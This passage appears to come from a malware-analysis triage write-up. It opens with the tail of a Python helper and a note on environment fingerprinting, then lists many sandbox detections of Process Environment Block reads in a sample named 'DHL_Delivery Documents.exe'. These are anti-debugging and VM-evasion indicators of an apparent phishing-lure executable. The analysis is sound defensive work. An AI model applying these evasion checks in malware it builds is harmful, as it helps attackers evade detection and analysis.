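    for fn, n in peb_hotspots(result):
        print(f"  repeated PEB reads in {fn}: {n}")
```

Memory-string rows (the VMware and Hyper-V hits above) are deliberately ignored here, since they evidence environment fingerprinting rather than code that can be tied to a function address; a full triage script would bucket those separately.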
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CD61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CD61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C8E1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C8E1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C8E1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C8E1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C8E1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE61E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C401F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C50185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CCC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CCC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C9019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C9019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C9019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C9019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA4144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA8158 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C16154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C16154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0C156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE4164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE4164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBA118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CD0115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C40124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C920DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0A0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C180E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C960E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0C0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C520F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C080A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA80A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CD60B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CD60B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C12050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C96050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C3C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C94000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C2E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C2E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C2E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C2E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0A020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0C020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA6030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CCC3CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C183C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C183C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C183C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C183C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C963C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBE3DB mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB43D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB43D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C203E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C2E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C2E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C2E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C463FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0E388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0E388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0E388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C3438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C3438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C08397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C08397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C08397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C92349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE634F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C9035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C9035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C9035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C9035C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C9035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C9035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB8350 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CDA352 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB437C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0C310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C30310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE8324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE8324 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE8324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE8324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE62D6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C202E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C202E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C202E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C90283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C90283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C90283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C202A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C202A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA62A0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C98243 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C98243 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0A250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE625D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C16259 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CCA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CCA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C14260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C14260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C14260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0826B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0823B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4E5CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4E5CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C165D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4A5D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4A5D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C125E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C3E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4C5ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4C5ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C12582 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C12582 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C44588 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4E59C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C905A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C905A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C905A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C345B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C345B1 mov eax, dword ptr fs:[00000030h]
